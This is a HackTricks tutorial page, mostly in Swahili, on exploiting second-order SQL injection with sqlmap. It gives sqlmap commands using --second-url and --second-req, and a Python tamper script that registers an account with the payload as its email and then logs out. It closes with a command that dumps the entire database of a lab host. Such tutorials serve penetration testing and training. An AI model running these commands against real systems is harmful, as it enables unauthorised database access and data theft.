HackTrickstip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
SQLMap inaweza kutumia SQLis za Pili.
Unahitaji kutoa:
- ombio ambapo payload ya sqlinjection itahifadhiwa
- ombio ambapo payload itatekelezwa
Ombio ambapo payload ya SQL injection inahifadhiwa ni imeonyeshwa kama katika injection nyingine yoyote katika sqlmap. Ombio ambapo sqlmap inaweza kusoma matokeo/utekelezaji wa injection inaweza kuonyeshwa kwa --second-url au kwa --second-req ikiwa unahitaji kuonyesha ombio kamili kutoka kwa faili.
Mfano rahisi wa pili:
#Get the SQL payload execution with a GET to a url
sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"
#Get the SQL payload execution sending a custom request from a file
sqlmap -r login.txt -p username --second-req details.txt
Katika kesi kadhaa hii haitatosha kwa sababu utahitaji kufanya hatua nyingine mbali na kutuma payload na kufikia ukurasa tofauti.
Wakati hii inahitajika unaweza kutumia sqlmap tamper. Kwa mfano, skripti ifuatayo itasajili mtumiaji mpya kwa kutumia sqlmap payload kama barua pepe na kutoka.
#!/usr/bin/env python
import re
import requests
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def login_account(payload):
proxies = {'http':'http://127.0.0.1:8080'}
cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}
params = {"username":"asdasdasd", "email":payload, "password":"11111111"}
url = "http://10.10.10.10/create.php"
pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
url = "http://10.10.10.10/exit.php"
pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
def tamper(payload, **kwargs):
headers = kwargs.get("headers", {})
login_account(payload)
return payload
A SQLMap tamper daima inatekelezwa kabla ya kuanza jaribio la kuingiza na payload na inapaswa kurudisha payload. Katika kesi hii hatujali kuhusu payload lakini tunajali kuhusu kutuma maombi, hivyo payload haibadilishwi.
Hivyo, ikiwa kwa sababu fulani tunahitaji mtiririko wa hali ngumu zaidi ili kutumia kuingiza SQL ya pili kama:
- Unda akaunti yenye payload ya SQLi ndani ya uwanja wa "email"
- Toka
- Ingia na akaunti hiyo (login.txt)
- Tuma ombi kutekeleza kuingiza SQL (second.txt)
Mstari huu wa sqlmap utasaidia:
sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
##########
# --tamper tamper.py : Indicates the tamper to execute before trying each SQLipayload
# -r login.txt : Indicates the request to send the SQLi payload
# -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt
# --second-req second.txt : Request to send to execute the SQLi and get the ouput
# --proxy http://127.0.0.1:8080 : Use this proxy
# --technique=U : Help sqlmap indicating the technique to use
# --dbms mysql : Help sqlmap indicating the dbms
# --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix
# --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln
# -a : Dump all
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.